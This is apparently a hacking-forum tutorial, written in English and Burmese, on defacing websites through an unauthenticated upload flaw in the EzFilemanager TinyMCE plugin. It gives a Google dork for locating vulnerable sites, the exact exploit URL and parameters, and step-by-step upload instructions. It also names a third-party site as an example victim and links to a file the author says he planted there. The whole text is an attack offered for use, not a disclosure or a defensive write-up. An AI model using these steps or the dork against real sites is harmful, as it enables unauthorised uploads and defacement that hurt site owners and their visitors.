EzFilemanager Deface Upload vulnerability

Google Dork inurl:ezfilemanager/ezfilemanager.php

Exploit : http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file

Go to this url : website.com/lap/includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php
and 

put ?sa=1&type=file after URL

now url will be :  http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file

ကြ်န္ေတာ္တို ့ေတြအဲ့မွာ  ,html ,pdf ,ppt ,txt ,doc ,rtf ,xml ,xsl ,dtd ,zip ,rar ,jpg ,png files ေတြ upload တင္နုိင္မွာျဖစ္ပါတယ္...
ကြ်န္ေတာ္ကေတာ့ txt ဖုိင္ေလးဘဲတင္ျပထားတယ္..

http://www.hollywood-arts.org/tinymce/jscripts/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=image

 

အဲ့မွာ ကြ်န္ေတာ္ အနီနဲ ့၀ုိက္ ျပထားပါတယ္.. အဲ့ဖုိင္ေတြကို ဆုိဒ္မွာ တင္ခြင့္၇ွိမွာျဖစ္ပါတယ္...
ပုံနည္းနည္းေသးသြားတယ္ဗ်ာ.. ctrl ခလုတ္ကို ဖိျပီး mouse ဘီး ေလးနဲ ့အတုိးအခ်ဲ ့လုပ္ၾကည့္လုိက္ပါ...
အဲ့မွာတင္ျပီးသြားရင္ေတာ့  browse တည္းျပန္သြားလုိက္ပါ.. သင့္ဖုိင္ေလး ေရာက္ေနတာေတြ ့ပါလိမ့္မယ္...

ကဲအဲ့ဖုိင္ေလး ကို ကလစ္နုိပ္လုိက္မယ္ဆုိရင္ေတာ့ သင္ တင္ထားတဲ့ဖုိင္ကို ျမင္ရမွာျဖစ္ပါတယ္..
ကဲ သြားၾကည့္လုိက္ပါ.. ကြ်န္ေတာ္တင္ထားတာေလး

http://www.hollywood-arts.org/ez-images/chg.jpg

source By http://cyberhackergroup.multiply.com/journal/item/44